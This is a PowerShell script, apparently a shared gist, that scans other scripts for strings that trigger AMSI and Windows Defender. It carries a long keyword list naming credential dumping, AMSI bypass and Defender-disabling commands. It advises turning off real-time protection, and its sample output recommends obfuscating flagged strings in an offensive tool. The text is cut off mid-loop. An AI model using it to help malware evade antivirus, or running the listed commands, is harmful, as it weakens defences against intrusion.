identify possible ams1 detection strings in files
Last active: August 26, 2024 07:04
<#
.SYNOPSIS
    Identify possible ams1 strings inside scripts
    Author: @r00t-3xp10it
    Tested Under: Windows 10 (19044) x64 bits
    Required Dependencies: none
    Optional Dependencies: none
    PS cmdlet Dev version: v2.2.18
.DESCRIPTION
    This cmdlet was written to detect suspicious ams1 strings in .ps1 or .psm1
    scripts, helping developers identify which line of the script the malicious
    string is on and take the necessary steps to prevent further detections.
.NOTES
    When scanning, it is advised to disable Windows Defender Real-Time Protection.
    All the strings contained in this script were found in different web forums,
    from Microsoft's official ams1 documentation to free open sources. This
    script does not perform any heuristic or memory scans, just a string search.
    This project detects suspicious strings and large $variable names, and counts
    the number of special characters present in the script compared with the
    script's total number of lines; the cmdlet then does the math [is_suspicious_?]
.Parameter FileToScan
    Full path of the script to scan
.Parameter LogFile
    Switch that creates a report logfile
.Parameter RateHigh
    Switch to only display 'rate High' results
.EXAMPLE
    PS C:\> .\identify_offencive_tools.ps1 -filetoscan "$pwd\evil.ps1"
.EXAMPLE
    PS C:\> .\identify_offencive_tools.ps1 -filetoscan "$pwd\evil.ps1" -logfile
.EXAMPLE
    PS C:\> .\identify_offencive_tools.ps1 -filetoscan "$pwd\evil.ps1" -ratehigh
.INPUTS
    None. You cannot pipe objects into identify_offencive_tools.ps1
.OUTPUTS
    👁🗨 Detecting [ams1] malicious strings 👁🗨
    File information
    Total lines : 4183
    File size : 277107
    Current Time : 26/12/2023 04:15:54
    Last access : 26/12/2023 04:15:51
    File hash : 0E2044C484CD29FE8E16E15E4CD2D3765703BF7E042239D01E0C5C1B29DC6079
    File to scan : C:\Users\pedro\Coding\meterpeter\meterpeter.ps1
    🍳 Scanning file ..
    Token : 1
    DetectionRate : Critical
    MaliciousString : IE`X
    LineNumber : 4407
    Token : 2
    DetectionRate : Critical
    MaliciousString : powershell -vers`ion 2
    LineNumber : 3622 3632 3637 3654 3658 3664
    Token : 3
    DetectionRate : Critical
    MaliciousString : ru`nas
    LineNumber : 385 465 542 546 672 676 3343 3363 3458 3916
    Token : 4
    DetectionRate : Medium
    MaliciousString : while($true)
    LineNumber : 794 978 3103
    🍳 File scanning report
    =====================================================================================
    Tokens found : 4
    Urgent attention : 3
    File total lines : 4183
    Special characters : 9356 [`+&'] MaxAllowed:[7395]
    Scan elapsed time : 00:02:06 ⏱️ 29 Friday 2023
    File scanned : C:\Users\pedro\Coding\meterpeter\meterpeter.ps1
    ⚙️ recomendation
    Its advice to obfuscate all high rate results found [3]
    because System.Management.Automation.Amsi contains entry
    http://bit.ly/System_Management_Automation_Engine_Runtime
    ⚙️ recomendation
    Its advice to reduce the number of special characters
    inside file like [`+&'] that reveal to forensics that
    we are dealing with an heavily obfuscated file\script
    URL:http://bit.ly/malicious-powershell-usage-detection
    =====================================================================================
.LINK
    https://github.com/r00t-3xp10it/redpill
    http://bit.ly/malicious-powershell-usage-detection
    http://bit.ly/System_Management_Automation_Engine_Runtime
    https://docs.velociraptor.app/exchange/artifacts/pages/powershellmonitoring
    https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
#>
[CmdletBinding(PositionalBinding=$false)] param(
    [string]$FileToScan="$pwd\identify_offensive_tools.ps1",
    [switch]$RateHigh,
    [switch]$LogFile
)
$TotalTokens = "321"
## Global variable declarations
$ErrorActionPreference = "SilentlyContinue"
$host.UI.RawUI.WindowTitle = "Identify_Offensive_Tools (IOT)"
write-host "👁🗨 Detecting [ams1] malicious strings 👁🗨`n" -ForegroundColor Green
$ScriptSize = (Get-Content -Path "$FileToScan"|Measure-Object -Line).Lines
## Keyword list. Entries are written with @ and ' noise characters so that this
## file does not trigger on its own list; the noise is stripped below before use.
$MaliciousKeywordsList = @(
    "I@E'X",
    "-e@n'c",
    "-n'o@p",
    "am@si",
    "vi'r@us",
    "key@log",
    "tr@ojan",
    "t@r'y'{",
    "cm'd /@c",
    "mal@ware",
    "payl@oad",
    "-b@x'o@r",
    "revsh@ell",
    "mimi@katz",
    "t'r@y '{'",
    "am@si.dl'l",
    "hashd@ump",
    "Ad@d-Ty'pe",
    "phi@sh@ing",
    "-@enc@od'ed",
    "DllI@mport",
    "obfu@sca@te",
    "imp@ers@onate",
    "rever@sesh@ell",
    "Exc@lus'ion@Path",
    "reve@rse sh@ell",
    "re@verse-she@ll",
    "s@y'st@'emi@n'f@o",
    "Ams@iSca'n@Bu'ff@er",
    "in@vok'e-mim@ik'atz",
    "-e@nco@de'dcom@ma'nd",
    "Excl'us@ionP@roc'ess",
    "In@vo'ke-Exp@ress'ion",
    "la@z'ag@ne.e'x'@e a'l@l",
    ":@:A'd@m'ini@s'tr@a'to@r",
    "re@d team@ing",
    "ams@iu'ti@ls",
    "ams'iIn@itFa'il@ed",
    "keys@troke",
    "buff@er ove@rflow",
    "bru@tefo@rce",
    "redte@am",
    "red te@am",
    "she@llcode",
    "file@less",
    "prive@sc",
    "esca@late pri@vileges",
    "passwo@rd guess@ing",
    "gue@ss log@in",
    "crede@ntial du@mp",
    "passw@ord spr@aying",
    "passwo@rd spr@ay",
    "clea@rte@xt pas@swo'rds",
    "rem@ote execut@ion",
    "cre@ds du@mp",
    "cre@denti@als du@mp",
    "pass th@e ha@sh",
    "pa@ss-the-h@ash",
    "gol@den tic@ket",
    "dump@ing the lsa@ss",
    "dumpi@ng lsa@ss",
    "du@mp ls'as@s",
    "cache@d crede@n'tials",
    "l@s'a secr@ets",
    "cry@pt'o:@:sc'a@u't@h",
    "impe'rso@nat@ing user",
    "imper@so'nate us@er",
    "im@pa'ck@et",
    "ls@as's du@mp",
    "pro@cdu@m'p",
    "obfu@scated",
    "obfu@scat@ion",
    "pw@du@m'p",
    "comm@and a@nd con@t'rol",
    "drop@per",
    "web sh@ell",
    "we@bsh@ell",
    "kerb@er'os re@la'y",
    "spo@ofing",
    "ele@va@te pr'ivi@lege",
    "ab@use ele'va@tion",
    "b@ypas@s u@a'c",
    "ua@c b'ypa@ss",
    "acce@ss tok@en man'ip@ula@ti'on",
    "to@ken imp'ers@onation",
    "tok@en the@ft",
    "ev@ade pro@c@ess-mon@i'to@ring",
    "bypa@ss pa@ss'wo@rd",
    "vi@ctim ip",
    "snif@fing",
    "poi@soning",
    "elev@ate pr'oc@ess pr@ivi'leg@es",
    "ele'v@ate its pr@ivi'leg@es",
    "by@pa'ss us@er acc@ou'nt con'tr@ol",
    "po'we@rsh'ell -e@p 'by@pa@ss",
    "po'we@rsh'ell -@exe@cut'io@np@ol'ic@y by@pas@s",
    "R'u@be'u@s.e'x@e du@m'p",
    "expl@oit",
    "key@log@ger",
    "sn@if@fer",
    "pas@sw'ord cr@ack",
    "pass@wo'rd hac@king",
    "pa@ss'wo@rd bre@ac'h",
    "pa's@swor@d at@ta'ck",
    "pass@wo'rd st@e'al@er",
    "by@pa'ss ant@ivi'rus",
    "b'ru@te fo@r'ce",
    "re@mo'te acc@e'ss",
    "pa'ss@wo'rd ha@sh'ing",
    "co@d'e inje@ction",
    "key@st'ro@ke log@gi'ng",
    "keyl@ogg'ing",
    "pas@swor'd sni@ff'ing",
    "ciph@er",
    "coo@kie steal@ing",
    "pas'sw@ord crac@king",
    "enc@rypt'ion",
    "pr@iv'ile@ge @es'cala@ti'on",
    "k'ey log@gi'ng",
    "pa'ss@word ha@rves@ting",
    "ea've@sdr@oppi@ng",
    "bru@te-fo'rc@ing",
    "coo@ki'e the@ft",
    "ref'lec@tion atta@ck",
    "cr@yp'to atta@ck",
    "smu@rfing",
    "pin@g o'f de@a'th",
    "crede@n'tial @th'eft",
    "ke'yl@ogg'e@r in@stall@at'ion",
    "has@hing",
    "file@le@ss at@ta@ck",
    "imp@er'sonati@on",
    "file@le'ss ma@lwa're",
    "payl'oa@d deliv@ery",
    "an@tivi'rus @ev'as@ion",
    "dat@a obfus@cation",
    "l@da'p in@je'ction",
    "dec@ry'ption",
    "Defi@neD@yn'ami@cAssembly",
    "Defi@ne@Dy'nam@icMo'dule",
    "Def@i'ne@Ty'pe",
    "Def@in'eC@onst'r@uc@tor",
    "Cre@at'eTy@pe",
    "Defi'ne@Lite@ral",
    "Def@in'eE@num",
    "Defin@eF'ie@ld",
    "ILG@en'er@ator",
    "Em'i@t",
    "Unv@e'rifi@abl'eC@ode@Att'rib@ute",
    "Defi@nePI'nvok@eMe'th@od",
    "G@e'tS@tr'e@am",
    "@Get@Ty'pes",
    "Get@Ass@em'blies",
    "Met@ho'ds",
    "Ge@tCon'stru@ct'or",
    "GetC@ons'tru@cto'rs",
    "Ge'tDef@ault'Me@mb'ers",
    "Ge@tEve@nt",
    "GetE@ve'nts",
    "Get@Fie'ld",
    "Ge@tFie'lds",
    "@Ge@tInt@er'face",
    "GetInt@erf'aceMap",
    "Ge@tIn'terf@aces",
    "GetM@em'be@r",
    "G'etM@emb@ers",
    "Get@Met'ho@d",
    "Get@Met'ho@ds",
    "Ge@tN'es@te'dType",
    "Get@Ne'st@ed@Ty'pes",
    "Ge@tPr'ope@rt'ies",
    "Ge@tPro'pe@rt'y",
    "@In'vok@eMe'mb@er",
    "Ma@k'eAr@ra'yTy@pe",
    "Mak@eB'yR@efT@yp'e",
    "Ma@ke'Ge@ne'ric@Type",
    "Mak'eP@oin'te@rTyp'e",
    "De'cl@ari'ngM@et'hod",
    "Decl'ar@ing@Ty'pe",
    "Ref@lec'ted@Ty'pe",
    "Typ@eHa@nd'le",
    "T@ype'In@iti'al@izer",
    "Un'de@rlyi'ng@Syst'em@Type",
    "In@te'rop@Se@rv'ic@es",
    "All@oc'HG@lo'ba@l",
    "Pt'rT@oSt'ru@ct@u're",
    "St@ru'ct@ur'eToP@t'r",
    "Fr@eeHG'lo@bal",
    "In'tPt@r",
    "Mem@ory'Str'e@am",
    "Def@lat'eSt@r'ea@m",
    "From@Ba'se6@4S'trin@g",
    "Enc'od@e'dCo@mm'and",
    "Byp'a@ss",
    "ToB@a'se6'4S@tri'n@g",
    "Exp@an'dS@tr@ing",
    "GetP'ow@erS'he@ll",
    "Op@enPr'oc@ess",
    "Vi@rtu'alAl@loc",
    "V'ir@tu@alF'r@ee",
    "Writ@ePro'cessMe@mory",
    "Crea@teU'serTh@r'ead",
    "Cl@ose'Ha@n'dle",
    "GetDe@le'g@ateF'orFun'cti@onP'oi@n@ter",
    "ke@rn'el3@2",
    "Cr@eat'eThr@e'ad",
    "me'mc@py",
    "Loa'dL@ib'ra@ry",
    "GetM@od'ul@eHa'nd@le",
    "Ge@tPr'ocA@dd@r'ess",
    "Vir'tu@al@Prot'ec't",
    "Fre@eLib'ra@ry",
    "Re'a@dPr'oc@ess@Mem'ory",
    "Cre'a@teRe'm@ot@eThr'ea@d",
    "Ad@justT'ok@enP@ri@vil'eges",
    "Wri@te@B'yt'e",
    "Wri@teI@nt'32",
    "O'penTh're@adT'ok@en",
    "Pt@rT'oS@tri@ng",
    "Ze@roFr'eeGlob@alA'llo@cU'ni@code",
    "Op@en@Pr'oce'ssT'ok@en",
    "Get@Tok'e@nInf'or@matio'n",
    "Se@tTh're@a'dTo@k'en",
    "Im'per@son'a@teLogg'edO'nUs@er",
    "Rev'er@tT'oSe@lf",
    "Ge@tLo'go'nS@ess@i'o@nData",
    "Crea't@e'Proc@es'sW@ithTo'ke@n",
    "Du'pli@cat'eTok@en'Ex",
    "Op@en@Wi'nd@owSt'ati'o@n",
    "Ope@nDe@s'ktop",
    "@Min'i'Du@mpWr@it'eD'ump",
    "A@dd'Sec@uri'tyPa@ck'age",
    "Enu@me'r@at@eSecu'ri@tyPa'ck@ages",
    "Ge@tPr@oce'ss@Ha'ndle",
    "Dange'ro@usG@etH'an@dle",
    "Get@As'yn@cK'ey@State",
    "'Key@bo'ar@dS'ta@te",
    "G@etFo're@grou@nd'Wi@ndow",
    "Bin'di@ngFl'ag@s",
    "No'n@Pu'bl@ic",
    "Scr'ip@tBl'oc@kLog'gi@ng",
    "Lo'gPi2peli'neEx@e@cuti'onDe@tails",
    "P'rot@ect'edEv@en'tLo@gg'ing",
    "while.*true",
    "pow@ers'hell -@ve'rsi@on '2",
    "Se'tVa@lue.*nu@ll,",
    ".Wr'it@e.*st,0,`$st.Len@gt'h",
    "sc@ht'ask@s '/cr@eat'e",
    "Se@t-M'pPr@e'fer@en'ce",
    "Alw@ay'sIns@t@al'lEle@vat'ed",
    "ru'n@as",
    "Ad'd-Exf@il'trati@on",
    "Ad@d-Pe'rs@ist'en@ce",
    "@Ad'd-@RegB'ack@do'or",
    "Ad'd-Sc@r'nSav@eBa'ck@doo'r",
    "E@nab'le@d-'Dup@li'cat@eTo'k@en",
    "Ge@t'-Key@strok'e@s",
    "LS'ASe@cr'e@t",
    "Ge't-Pa's@sHa's@h",
    "'G@et-Re@gAl'way@sI'nst@all'Ele'va@t@ed",
    "Ge@t-S'cre@en'shot",
    "G'e@t-Ser@vi'ceUn'qu@oted",
    "Ge't-@Syst'em",
    "Get'-V@@ed'en@tial",
    "In@vo'ke-B@yp'assU'AC",
    "Inv@ok@e-Dl@lI'nj@ecti'o@n",
    "In'vo@ke-M@imi@ki'tt@e'nz",
    "Inv'ok@e-PS'I'nj@ec't",
    "I@nv'ok@e-P'sEx@ec",
    "I@nv@ok@e-'Ru@nA's",
    "In@vo'ke-W@Scr'iptB@yp@as'sU@A'C",
    "O'u@t-@Mini'd@um'p",
    "Am@siB'yp@as's",
    "ni@sh'a@ng",
    "Inv'ok@e-S@he'll@Co'mm@and",
    "@-dum'pc@r",
    "SeI@mp'erso@na'te",
    "SeDe'bu@gPri'vi@leg'e",
    "cra@ck'map@ex'e@c",
    "ls@ad'ump:':s@a'm",
    "SEK'UR@LS'A:@:Pt'h",
    "ke'r@ber'os:':p@tt",
    "k'erb@ero's::go@ld'en",
    "s@eku'rl@sa:':mi@nid'u@mp",
    "sek'u@rls'a:@:log@o'nPas@s'wor@ds",
    "to'ke@n:':el'ev@at'e",
    "in@vok'e-@com'ma@nd",
    "ru'ndl@l3'2@",
    "ce'r@tu'ti@l",
    "m@sh't@a",
    "we'v@tut@il.e'x'e' c@l'",
    "S@hel'lE'xec@ut@e",
    "sc s@to'p @Win@Defe'nd",
    "@Rem'ove-@MpT'h're@at",
    "s@'c s@top 'Se@n'se",
    "a@@ms'i_d'is@ab@l'e",
    "@lsa's'@@'s.e'x'e",
    "we@vtu't@il @c'l'",
    "a'msi@co@@n'text",
    "@/sav'ecr@e'd",
    "n'c.e'x'e",
    "-@Scr'i@ptBl@oc'k",
    "@Du'm@pS'A@M",
    "@Du'm@p-S'A@M",
    "@S-'1'-5-3@'2-5@4@'4",
    "imp@e'rso@na'te@us@e'r:",
    ".do@w'nl@oa'ds@tr'i@ng'",
    "Ex@cl'usi@onEx'ten@si@@on",
    "sek@ur'l@s'a:@:tic@ke't@s",
    "sy'st@em.@net'.w@ebc@li'e@nt",
    "Mi@niDu@mp'Wi@thHa@ndl'eD@ata",
    "Re@alTi@me'Pr@ot@ec'ti@on'En@ab'le@d",
    "Min@iD'u@mpWi@thP@ro'ces@sTh're@adDa@ta",
    "'Sys@t'em.@Man'age@me'nt.'Au@tom'at@io'n.",
    "@-Di@sa@bleI@OA'V'Pr@ote@c'ti@on @`$tr@ue",
    "-D@isa@bleRe@al'ti@m'ePro'te@cti@o'n `$tru@e",
    "-D@isa@bleRe@al'ti@meM'o'@nito@ri@n'g `$tr'ue",
    "I@nv'o@ke-@We'bR@equ'e@s@t .*`"{0}`?url={1}",
    "S@ys'tem.Run@tim'e.@Int'er@opSer'vi@ces@.'Ma@rs@ha'l",
    "H@KL'M:\SO'FTW@A'RE\Mi@cr'os@oft\A'MS@I@\Pro'vi@de'rs",
    "M@pCm'dR'u@@n.e'x'e -@Rem'oveD@ef'in@iti'o@ns -'Al@l",
    "'-Dis@abl@eIntr@us'ionP@re've@nt'ionS'y'@ste'm `$tr@ue"
)
## Rating strings
$HigthRate = "Mi@niDu@mp'Wi@thHa@ndl'eD@ata|Min@iD'u@mpWi@thP@ro'ces@sTh're@adDa@ta|sek@ur'l@s'a:@:tic@ke't@s|R'u@be'u@s.e'x@e du@m'p|cry@pt'o:@:sc'a@u't@h|.do@w'nl@oa'ds@tr'i@ng'|Ke@ybo@a'r'dSt@a'te|Dl@lIm'po@rt|la@z'ag@ne.e'x'@e a'l@l|'-Dis@abl@eIntr@us'ionP@re've@nt'ionS'y'@ste'm `$tr@ue|M@pCm'dR'u@@n.e'x'e -@Rem'oveD@ef'in@iti'o@ns -'Al@l|G@e'tS@tr'e@am|we'v@tut@il.e'x'e' c@l'|we@vtu't@il @c'l'|-D@isa@bleRe@al'ti@meM'o'@nito@ri@n'g `$tr'ue|-D@isa@bleRe@al'ti@m'ePro'te@cti@o'n `$tru@e|@-Di@sa@bleI@OA'V'Pr@ote@c'ti@on @`$tr@ue|a'msi@co@@n'text|a@@ms'i_d'is@ab@l'e|po'we@rsh'ell -@exe@cut'io@np@ol'ic@y by@pas@s|S@hel'lE'xec@ut@e|'I@E'X@|-'e@n'c|-n'o@p|a'ms@i|c'md @/c'|mim@ik'at@z|A'dd@-T'y@p'e|-@en'c@od'ed|A@ms'iSc'an@Bu@f'fe@r|i'nv@o'ke-@mim'ik@a'tz|-'en@cod'edco@mm'and|In@vok'e-'Ex@pres'si@on|am'si@ut'il@s|ams'iI@ni'tFa@il@e'd|ls'a @se'cr@et@s|im'pac'@et|pr@ocd'u@mp|pw'd@um'p|by'pa@s@@s ua'@c|u'a@c by@p'a@ss|po@we'rsh@ell '-e@p by'pa@s's|Defi@neDy'namicAs@se'mbly|De'fi@neDyn'amic@Mo'du@le|De'fi@neT'yp@e|D@efi'neC@on'str@uc'tor|Cr@ea'teT@yp'e|De@fi@neLi'te@ra@l|D'ef@in'eEn@um|D@ef'in@eFi'el@d|I'LGe@ne'ra@tor|E@mi't|De'fi@nePIn@vok'eMet@ho'd|G@etT'yp@e's|Ge'tAs@se'mbli@es|Ge'tCo@nst'ru@c@tor|G@etC'onst'ru@ct'ors|Ge@tE'ven@t|G'e@tEv@e'nts|@Ge'tFi@el'd|G'etF@ie'l@ds|GetI'nte@rfa'ceM@ap|G'etIn@ter@f'ace|GetM@et'h@od|'Ge@tMe@tho@ds|G@etN'est@e'dTy@pe|GetN'est@edT'y@pe's|Ma@keA'rr@ayTy'p@e|Ma'keB@yRe'fTy@p'e|@Mak'eG@en'er@ic@T'y@pe|M@ak'ePoin'te@rT@y@pe|Dec@lar'ingMe@t'ho@d|Decl@@ari'ngTy'p@e|T@yp'eHa'nd@le|Typ'eIn@it'ia@li@z'er|Int'er@opSer'vi@c'es|Al'locH@Glo@b'a@l|'Pt@rT'oStr'uc@t'ur@e|St@ruc'tur@eT'oP@t'r|Fre@eH'Gl'ob@al|'I@ntP't@r|Memo'rySt@re'am|De@fla'teSt'r@eam|@Fro'mBa@s'e6@4S't@ri'ng|En'cod@edC'om'm@a@nd|'T@oBa'se6'4@@Str'in@g|Ope'nPro'c@ess|'V@ir't@ualA@ll'oc|Vir't@ualF'r@ee|Wr'it@ePro@ce'ssM'em@o'ry|Cre@at'eUs'erT@hr@e'ad|Clo@seHa'nd@le|ke'rn@el@3'2|GetD@ele'gateF'or@Fu'nct@io'nPo'int@e'r|@C're'a@teTh@r'ead|me'mc@p'y|Ge@tPr'oc@A'dd@@r@es's|Vir@tu@alPr'ot@e'ct
|Rea'dPr@oc@essM'em@or'y|Cr@ea'teRe'moteTh@re'ad|@Wr'iteBy@t'e|Adj@us'tTok'en@Pr@ivi'leg@e's|Wr'it@eIn@t3'2@|Ope'nTh@re'adT@ok'en|P@trT'oStr'in@g|Ze@roFr'eeGl@obalA@ll'ocUn@ic'od@e|Op'enPr@oc'essT@o'ke@n|Ge@tTok'enIn@fo'rm@at'i@on|S@etT'hr@ea'dTok'e@n|Im@pe'rs@ona'teLo@gg'edOn@U's@er|@Re've@rtT'oS@e'l@f|Cr@ea'tePro@ce@s'sWi'thT@ok'en@|D'up@lic'ateT'ok@enE'x'|Ope'nWi@ndo'wSta@ti@o'n|Mi'niD@um'pWr@i'teD'um@p@|@G'etPr@oce'ssH@an'dl@e|Ge'tAs'yncK@eyS'ta@t'e|Ge@tKe'ybo@ar@dS@ta'te|@No@nPu'b@li@'c@|Pro'tec@te'dE've@ntL@og@g'in@g|pow'ers@hell @-'ve@rs'ion @@2'|@r@u'n'a@s|Se'tVa@lue.*nu@ll,|@sch@ta'sks@ '/@cr@e'at@e|Se@t-@M'pPref'er@e'nc@e|A'lw@ay'sInst@allE'lev'at@ed|Ad@d'-Ex@fil'tra@ti@on|@Ad@d-Pe'rs@is@t'en@ce'|Ad'd-@R'egBa@@ckd'o@o@r|A'dd@-'Sc@rnS'av@eBa'c@kd@oo'r|En'a@bl'ed-Du'plic@a'teTo@ke'n|Ge't-@Ke'yst@ro'k@e's|@LS'ASe@c're@t@|G'et-Pa'ssH@as'h@|Ge't-R@egA'lwa'ysIn@st@allE'lev@a't@e'd|@Get@-Se'rvi@ceU'nq@u'ote@d'|@Ge't-Sy@@s'te@'m|Ge@t-'Vau'ltCr@ede'nt@i'al|I'@nv'ok@e-@By'pa@@s's'U'@A'C@|Inv@o'ke-Dl@lI'nj@ec't@i@@o'n|@In@v'o'ke@-M'im@ik'it@t'e@@n'z|I'nv@oke-@P'SIn@je'c@t'|@'I@n'vo'k@e-Ps@E'x@e@@c|@In@v'ok@'@e-@R'u@nA'@s'@|@In@v'ok@'@e-W'Scr@ip'tBy@@pa's'sU@A'@C'|O'ut-Min'@id'um@p'|@Am'siB@ypa's@s|nish@a'ng|@-du'mp@cr|S@eImp'er@son'a@te@|S@eDe'bugP'r'i@vi@'@leg@e'|cr'a@ckm'ape@x'ec@|l@sad'u@mp:@:s'am'|S'EK@URL'SA:@:Pt'h@|ke@rbe'ro@s:':@pt't@|@kerb'e@ro's:@:go'l@d@@e'n|@sek'url@'@s'a:':min'id@u'm@@p'|se'kur@ls'a:@:@lo'gonPa@'ss@w@o'rds'|@tok@en:':el'ev@a't@e@|in'v@o'ke-@com'm@a'nd@|c'ert@ut@il|m'sh@t'a|sy'st@em'.@net.we'bcl@i'en@t''@|@Sy@st'em.@Man'ag@@e'men@t'.Au@t'oma@t'io@n.'@'|Sy'st@em'.@Ru'n@'@ti@m'e.'Inte@r'opServ@i'ces@.Ma'rsh@a'l'|HK@L'M@:\SO'FT@@WA'R'E\Micr@oso'ft@\A'M@@S'I@\Pro'vi@de'rs@'" | |
$MediumRate = "-b@x'o@r|I@nv'o@ke-@We'bR@equ'e@s@t .*`"{0}`?url={1}|while.*true|imp@e'rso@na'te@us@e'r:|Re@alTi@me'Pr@ot@ec'ti@on'En@able@d|.W@ri'te.*st,0,`$st.Le'ng@t'h|:@:A'd@m'ini@s'tr@a'to@r|Re@m'o@ve-@MpTh@r'e@at|-@Scr'i@ptBl@oc'k|Ex@cl'usi@onEx'ten@si@@on|Ex@clu'sio@nP'at@h|Exc@lu'sionPr@oc@e'ss|@Du'm@pS'A@M|@Du'm@p-S'A@M|@S-'1'-5-3@'2-5@4@'4|t@r'y'{|t'r@y '{'|s@y'st@'emi@n'f@o" -replace '(@|'')','' | |
## Internal
$ScanStartTimer = (Get-Date)
## Strip the @ and ' noise from the rating pattern and escape backslashes so it is a valid regex
$HigthRate = $HigthRate -replace '(@|'')','' -replace '\\','\\'
$ScriptDescription = (Get-ChildItem -Path "$FileToScan" -EA SilentlyContinue)
## Same clean-up for the keyword list (each entry is later used as a Select-String regex)
$MaliciousKeywordsList = $MaliciousKeywordsList -replace '(@|'')','' -replace '\\','\\'
If((Get-MpComputerStatus).RealTimeProtectionEnabled -match '^(True)$')
{
    write-host "`n📛 Its advice to disable windows defender RealTime Protection.`n`n" -ForegroundColor Red
    Start-Sleep -Seconds 2
}
If(-not(Test-Path -Path "$FileToScan" -EA SilentlyContinue))
{
    write-host "📛 Not found: '$FileToScan'`n" -ForegroundColor Red
    return
}
If(-not($FileToScan -imatch '(.ps1|.psm1)$'))
{
    write-host "📛 This cmdlet only accepts [.ps1|.psm1] scripts" -ForegroundColor Red
    write-host " filetoscan '" -NoNewline
    write-host "$FileToScan" -ForegroundColor Green -NoNewline
    write-host "'`n"
    return
}
function Invoke-CountObfuscationChars ()
{
    <#
    .SYNOPSIS
        Author: @r00t-3xp10it
        Helper - 🔥 Count the number of special chars in script 🔥
    .NOTES
        This function flags as suspicious more than 8 [`+&'] special chars
        per line. To find that value the function multiplies the number of lines
        by 8 ( max special chars allowed per line == MaxCharsAcceptable )
    #>
    $MatchedString = 0
    $RawCmdletData = (Get-content -Path "$FileToScan" -Raw)
    ## Regular expression pattern to match obfuscated chars
    $RegexPattern = "[``+&\']"
    ## Count the number of obfuscated characters in the script
    ## (kept in its own variable rather than overwriting the automatic $Matches)
    $RegexMatches = [regex]::Matches($RawCmdletData, $RegexPattern)
    $MatchedString = $RegexMatches.Count
    ## Define how many chars is acceptable
    # Only 8 special chars per line allowed!
    # so we multiply the number of lines by 8 (max special chars allowed)
    $ScriptSize = (Get-Content -Path "$FileToScan"|Measure-Object -Line).Lines
    $MaxCharsAcceptable = $ScriptSize * 8
    If($MatchedString -gt $MaxCharsAcceptable)
    {
        echo "Rec" > "$Env:TMP\Recomendation.log"
        write-host "Special characters : " -NoNewline
        write-host "$MatchedString" -ForegroundColor Red -NoNewline
        write-host " [" -NoNewline
        write-host "``+&'" -ForegroundColor DarkYellow -NoNewline
        write-host "] MaxAllowed:[" -NoNewline
        write-host "$MaxCharsAcceptable" -ForegroundColor DarkYellow -NoNewline
        write-host "]"
        If($LogFile.IsPresent)
        {
            echo "[KO] Large number of [``+&'] chars detected: $MatchedString" >> "$pwd\identify_offencive_tools.log"
        }
    }
}
function Invoke-MaliciousVarsScan ()
{
    <#
    .SYNOPSIS
        Author: @r00t-3xp10it
        Helper - 🔥 Detect large $variables names inside script 🔥
    .NOTES
        Attackers commonly use long $variable names as obfuscation; this
        function flags as suspicious $variable names longer than 40 chars
    #>
    ## Regex search - $VariableName( =|=)
    $ScanMaliciousVars = (Get-Content -path "$FileToScan"|Select-String -Pattern '\$([a-zA-Z0-9_]*(\s=|=))')
    ForEach($Item in $ScanMaliciousVars)
    {
        ## Delete all chars after the = (equal) sign
        $RawSuspicious = $Item -Split('=')|Select-Object -First 1
        ## Delete all chars before the $ (dollar) sign
        $SuspiciousString = $RawSuspicious -replace '^(.*\$)',''
        ## Re-construct the string again for report output
        $SanitizePath = "`$" + "$SuspiciousString" + "=" -join ''
        If($SuspiciousString.Length -gt 40)
        {
            echo "Rec" > "$Env:TMP\SuspiciousVars.log"
            write-host "Suspicious `$var= : " -NoNewline
            write-host "$SanitizePath" -ForegroundColor Red
            If($LogFile.IsPresent)
            {
                echo "[KO] Suspicious [$]var= $SanitizePath" >> "$pwd\identify_offencive_tools.log"
            }
        }
    }
}
## Disclaimer
$MsgBoxTitle = " Identify_Offencive_Tools (IOT)"
$MsgBoxText = "All the strings contained in this cmdlet list were found in diferent web sites since microssoft oficial documentation until free sources. This script it will not make any complicated scans, but it helps developers to review huge files for suspicious strings [ams1] and act accordingly.`n`nThis cmdlet uses color schemes to better identify string detection rates, it classify rate higth as red, rate medium as darkmagenta and rate low as yellow color."
powershell (New-Object -ComObject Wscript.Shell).Popup("$MsgBoxText",0,"$MsgBoxTitle",0+64)|Out-Null
## Header
$CurrentTime = (Get-Date).ToString()
$Tamanho = $ScriptDescription.Length
$SHA1 = (Get-FileHash "$FileToScan").Hash
$LastAccess = $ScriptDescription.LastAccessTime.ToString()
write-host "File information" -ForegroundColor DarkYellow
write-host "Total lines : $ScriptSize"
write-host "File size : $Tamanho"
write-host "Current Time : $CurrentTime"
write-host "Last access : $LastAccess"
write-host "File hash : $SHA1"
write-host "File to scan : " -NoNewline
write-host "$FileToScan" -ForegroundColor Green
If($LogFile.IsPresent)
{
    <#
    .SYNOPSIS
        Author: @r00t-3xp10it
        Helper - Create logfile header function
    #>
    echo "Computer: $((Get-WmiObject Win32_OperatingSystem).CSName)" > "$pwd\identify_offencive_tools.log"
    echo "$((Get-WmiObject Win32_OperatingSystem).Caption) - $((Get-WmiObject Win32_OperatingSystem).OSArchitecture)" >> "$pwd\identify_offencive_tools.log"
    echo "Identify_Offencive_Tools - $CurrentTime" >> "$pwd\identify_offencive_tools.log"
    echo "FileToScan: $FileToScan`n" >> "$pwd\identify_offencive_tools.log"
    write-host "Logfile : " -NoNewline
    write-host "$pwd\identify_offencive_tools.log" -ForegroundColor DarkYellow
}
write-host "`n`n🍳 Scanning file ... "
Start-Sleep -Seconds 2
$Hight = 0 ## Set counter to 0
$Counter = 0 ## Set counter to 0
ForEach($RawStringDetection in $MaliciousKeywordsList)
{
    ## Search for strings or regex inside file
    $MatchedString = (Get-Content -Path "$FileToScan"|Select-String -Pattern "$RawStringDetection" -EA SilentlyContinue)
    If($MatchedString -iMatch "$RawStringDetection")
    {
        If($RawStringDetection -imatch "$HigthRate")
        {
            $Conf = "Critical"
            $ColorSet = "Red"
            $Hight = $Hight + 1
        }
        ElseIf($RawStringDetection -imatch "$MediumRate")
        {
            $Conf = "Medium"
            $ColorSet = "DarkMagenta"
        }
        Else
        {
            $Conf = "Low"
            $ColorSet = "DarkYellow"
        }
        ## Get file description
        $Description = (Get-ChildItem -Path "$FileToScan"|Select-Object *)
        $Name = $Description.PSChildName
        $Line = $MatchedString.LineNumber
        $Counter = $Counter + 1
        If($RateHigh.IsPresent)
        {
            ## Only display 'rate high'
            If($ColorSet -match '^(Red)$')
            {
                ## Output results OnScreen
                If($RawStringDetection -match '.\*[^"]')
                {
                    $RawStringDetection = $RawStringDetection -replace '.\*','($'
                }
                Else
                {
                    $RawStringDetection = $RawStringDetection -replace '.\*','('
                }
                write-host "`nToken : $Hight"
